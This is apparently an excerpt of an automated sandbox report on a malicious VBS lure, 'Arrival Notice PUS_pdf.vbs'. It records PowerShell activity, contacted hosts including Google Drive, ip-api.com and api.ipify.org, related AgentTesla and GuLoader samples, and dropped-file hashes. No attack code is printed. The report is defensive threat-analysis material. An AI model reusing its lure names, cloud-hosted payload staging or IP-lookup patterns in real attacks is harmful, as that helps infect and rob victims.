                          http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://drive.usercontent.google.compowershell.exe, 00000003.00000002.2266575309.00000189233D7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              http://crl.microsoftpowershell.exe, 00000009.00000002.2003068899.00000000032BF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://go.micropowershell.exe, 00000003.00000002.2266575309.0000018922882000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://drive.googPpowershell.exe, 00000003.00000002.2266575309.0000018923399000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://drive.google.compowershell.exe, 00000003.00000002.2266575309.0000018922EAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.usercontent.googhpowershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://drive.usercontent.google.compowershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://drive.google.compowershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore68powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://apis.google.compowershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.comhPpowershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      208.95.112.1
                                                      		ip-api.comUnited States
                                                      		53334TUT-ASUSfalse
                                                      142.251.15.139
                                                      		drive.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      142.250.105.132
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      104.26.13.205
                                                      		api.ipify.orgUnited States
                                                      		13335CLOUDFLARENETUSfalse

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1427934
                                                      Start date and time:2024-04-18 11:06:00 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 49s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:16
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Arrival Notice PUS_pdf.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
                                                      EGA Information:
                                                      • Successful, ratio: 33.3%
                                                      HCA Information:
                                                      • Successful, ratio: 94%
                                                      • Number of executed functions: 124
                                                      • Number of non-executed functions: 7
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 8108 because it is empty
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      11:06:52API Interceptor1x Sleep call for process: wscript.exe modified
                                                      11:07:05API Interceptor4266x Sleep call for process: powershell.exe modified
                                                      11:07:59API Interceptor3676x Sleep call for process: wab.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      208.95.112.1yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      dgxK76VlXC.exeGet hashmaliciousAsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRATBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                      • api.ipify.org/
                                                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/?format=json
                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                      • api.ipify.org/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ip-api.comyDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                      • 208.95.112.1
                                                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                      • 208.95.112.1
                                                      bg.microsoft.map.fastly.netTransferencias SEPA.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      FACTURA 130424435.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      justificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 199.232.214.172
                                                      http://185.91.69.110Get hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      http://ranchpools.comGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                      • 199.232.210.172
                                                      https://windowdefalerts-error0x21908-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                      • 199.232.210.172
                                                      https://windowdefalerts-error0x21902-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                      • 199.232.214.172
                                                      api.ipify.orgPurchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      invoice & packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      ZG17uv37pi.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUS5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                      • 104.21.84.67
                                                      NEW ORDER.docGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.21.25.202
                                                      file.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 104.26.4.15
                                                      dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 104.26.5.15
                                                      5Dw2hTQmiB.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.44.10
                                                      Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.44.10
                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      https://ortelia.com/Downloads/Curator/CuratorSetup.exeGet hashmaliciousHavocBrowse
                                                      • 1.1.1.1
                                                      TUT-ASUSyDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                      • 208.95.112.1
                                                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                      • 208.95.112.1

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0eTransferencias SEPA.vbsGet hashmaliciousUnknownBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      shipping doc.vbsGet hashmaliciousGuLoaderBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      FACTURA 130424435.vbsGet hashmaliciousUnknownBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      justificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exeGet hashmaliciousUnknownBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      • 104.26.13.205
                                                      37f463bf4616ecd445d4a1937da06e19shipping doc.vbsGet hashmaliciousGuLoaderBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      u2.batGet hashmaliciousBazar Loader, QbotBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      FACTURA2402616 - BP.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      #U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      #U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      S#U00d6ZLE#U015eME DEV8759 - pdf.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132
                                                      CONTRACTUL DEV8759-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.251.15.139
                                                      • 142.250.105.132

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                      Download File
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                      Category:dropped
                                                      Size (bytes):69993
                                                      Entropy (8bit):7.99584879649948
                                                      Encrypted:true
                                                      SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                      MD5:29F65BA8E88C063813CC50A4EA544E93
                                                      SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                      SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                      SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                      Download File
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):330
                                                      Entropy (8bit):3.217505909494558
                                                      Encrypted:false
                                                      SSDEEP:6:kKldMllEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:ClbkPlE99SNxAhUeVLVt
                                                      MD5:F34839D70EB1CB8AC310A63F2190F067
                                                      SHA1:A8B529FBA942CA692578FF1FE9D6B7D3D52DE675
                                                      SHA-256:7DA0DC49C592CEF615528D84113ABCDFF51A7AFB307646DA7D29102274586110
                                                      SHA-512:9AE2375284D018CD7B05F55F8AA5FC8445A659F0BA2A5F6B1003CE836A953E270C096BD54FB566935B3529C49A11068321D686270F1B86AFF7E86CA5709D674D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:p...... ............o...(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):11608
                                                      Entropy (8bit):4.886255615007755
                                                      Encrypted:false
                                                      SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                      MD5:C7F7A26360E678A83AFAB85054B538EA
                                                      SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                      SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                      SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aaqfbwvt.xte.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_el1m15uv.qqi.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnu3giay.tgb.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_realgte5.3nq.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Australians.Hov

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):447556
                                                      Entropy (8bit):5.964935009024267
                                                      Encrypted:false
                                                      SSDEEP:12288:ZOey8mg9jB2TGdg69B1H0FIxB/pTH0pdlIvxI:ZOey8vN2G1LlpBxTK4O
                                                      MD5:6C03450B7DF387C19D5C8B35A16DF0F2
                                                      SHA1:931D81D4308B4BC4963720B7C241AB99CB5F7F75
                                                      SHA-256:49F59F2297BEC5B10C4B085DC130BB75BB7DC06E71D74D333663365DF8A5C65D
                                                      SHA-512:C1160590583CA0381BB07360D7B328E552BF8EDE681616283394AA254C4011A09C1F86F760FA9E62C31AB3FC2F9AB083E5BFDD24178EF84D4AFC2582CAA400A1
                                                      Malicious:false
